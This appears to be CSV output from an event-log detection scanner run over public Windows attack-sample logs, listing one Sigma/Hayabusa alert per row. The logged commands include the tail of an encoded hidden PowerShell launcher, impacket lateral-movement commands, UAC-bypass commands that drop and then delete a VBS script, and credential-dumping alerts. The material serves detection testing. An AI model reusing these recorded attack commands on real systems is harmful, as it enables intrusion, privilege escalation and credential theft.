JI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,FromBase64String Command Line,,rules/sigma/process_creation/win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.356 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,Suspicious PowerShell Command Line,,rules/sigma/process_creation/win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.356 +09:00,IEWIN7,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.371 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:54.152 +09:00,IEWIN7,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:32:51.168 +09:00,IEWIN7,1,informational,Process Creation,Command: cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.168 +09:00,IEWIN7,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.246 +09:00,IEWIN7,1,informational,Process Creation,Command: cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.246 +09:00,IEWIN7,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.324 +09:00,IEWIN7,1,informational,Process Creation,Command: cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.324 +09:00,IEWIN7,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.324 +09:00,IEWIN7,1,high,Whoami Execution Anomaly,,rules/sigma/process_creation/win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.371 +09:00,IEWIN7,1,informational,Process Creation,Command: whoami /all : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.371 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.371 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:35:11.856 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\mmc.exe -Embedding : Path: C:\Windows\System32\mmc.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:11.856 +09:00,IEWIN7,1,high,MMC20 Lateral Movement,,rules/sigma/process_creation/win_mmc20_lateral_movement.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:12.449 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\mmc.exe -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:12.449 +09:00,IEWIN7,1,high,MMC Spawning Windows Shell,,rules/sigma/process_creation/win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.449 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\mmc.exe -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.449 +09:00,IEWIN7,1,high,MMC Spawning Windows Shell,,rules/sigma/process_creation/win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.512 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\mmc.exe -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.512 +09:00,IEWIN7,1,high,MMC Spawning Windows Shell,,rules/sigma/process_creation/win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.512 +09:00,IEWIN7,1,high,Whoami Execution Anomaly,,rules/sigma/process_creation/win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.543 +09:00,IEWIN7,1,informational,Process Creation,"Command: whoami /all : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.543 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.543 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 07:48:59.260 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\vssvc.exe : Path: C:\Windows\System32\VSSVC.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-05-01 07:49:09.760 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\Installer\MSI4FFD.tmp"" : Path: C:\Windows\Installer\MSI4FFD.tmp : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\msiexec.exe /V",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-05-01 07:49:09.760 +09:00,IEWIN7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-05-01 07:49:10.198 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\Installer\MSI4FFD.tmp""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-05-01 07:49:10.198 +09:00,IEWIN7,1,medium,Always Install Elevated MSI Spawned Cmd And Powershell,,rules/sigma/process_creation/sysmon_always_install_elevated_msi_spawned_cmd_and_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-05-01 07:52:27.588 +09:00,IEWIN7,1,informational,Process Creation,Command: whoami : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: cmd,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-05-01 07:52:27.588 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-05-01 07:52:27.588 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-05-02 23:48:53.950 +09:00,IEWIN7,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx +2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx +2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx +2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx +2019-05-03 02:21:42.678 +09:00,SANS-TBT570,1102,high,Security log was cleared,User: student,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privilegedebug-tokenelevate-hashdump.evtx +2019-05-04 00:20:20.711 +09:00,SANS-TBT570,1102,high,Security log was cleared,User: student,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx +2019-05-04 00:20:27.359 +09:00,SANS-TBT570,4672,informational,Admin Logon,User: tbt570 : LogonID: 0x1861f7,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx +2019-05-04 00:20:28.308 +09:00,SANS-TBT570,4634,informational,Logoff,User: tbt570 : LogonID: 0x1861f7,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx +2019-05-08 12:00:11.778 +09:00,DC1.insecurebank.local,1102,high,Security log was cleared,User: administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_security_dcshadow_4742.evtx +2019-05-09 10:59:28.684 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 10:59:28.950 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 10:59:29.090 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\eventvwr.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 10:59:29.090 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 10:59:29.090 +09:00,IEWIN7,1,critical,UAC Bypass via Event Viewer,,rules/sigma/process_creation/process_creation_sysmon_uac_bypass_eventvwr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 11:00:01.794 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\System32\wsqmcons.exe : Path: C:\Windows\System32\wsqmcons.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 11:07:51.131 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdclt.exe"" /kickoffelev : Path: C:\Windows\System32\sdclt.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx +2019-05-09 11:08:00.446 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /c notepad.exe : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ?",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx +2019-05-09 11:08:00.446 +09:00,IEWIN7,1,medium,Sdclt Child Processes,,rules/sigma/process_creation/sysmon_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx +2019-05-09 11:52:18.844 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" C:\Users\IEUser\AppData\Local\Temp\wscript.exe.manifest C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp : Path: C:\Windows\System32\makecab.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:18.922 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:18.953 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:18.969 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:19.250 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:21.250 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" C:\Windows\System32\wscript.exe C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp : Path: C:\Windows\System32\makecab.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:21.265 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:21.281 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:21.297 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:21.594 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:23.500 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /C ""echo Dim objShell:Dim oFso:Set oFso = CreateObject(""Scripting.FileSystemObject""):Set objShell = WScript.CreateObject(""WScript.Shell""):command = ""powershell.exe"":objShell.Run command, 0:command = ""C:\Windows\System32\cmd.exe /c """"start /b """""""" cmd /c """"timeout /t 5 >nul&&del C:\Windows\wscript.exe&&del C:\Windows\wscript.exe.manifest"""""""""":objShell.Run command, 0:Set objShell = Nothing > ""C:\Users\IEUser\AppData:tghjx5xz2ky.vbs"""" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:23.531 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /C ""C:\Windows\wscript.exe ""C:\Users\IEUser\AppData:tghjx5xz2ky.vbs"""" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 12:25:24.896 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdclt.exe"" : Path: C:\Windows\System32\sdclt.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx +2019-05-09 12:25:25.067 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /name Microsoft.BackupAndRestoreCenter : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\sdclt.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx +2019-05-09 12:25:25.067 +09:00,IEWIN7,1,medium,Sdclt Child Processes,,rules/sigma/process_creation/sysmon_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx +2019-05-10 21:21:57.077 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 7 -p c:\Windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx +2019-05-10 21:22:08.465 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""c:\users\ieuser\appdata\local\temp\system32\mmc.exe"" ""c:\users\ieuser\appdata\local\temp\system32\perfmon.msc"" : Path: C:\Users\IEUser\AppData\Local\Temp\system32\mmc.exe : User: 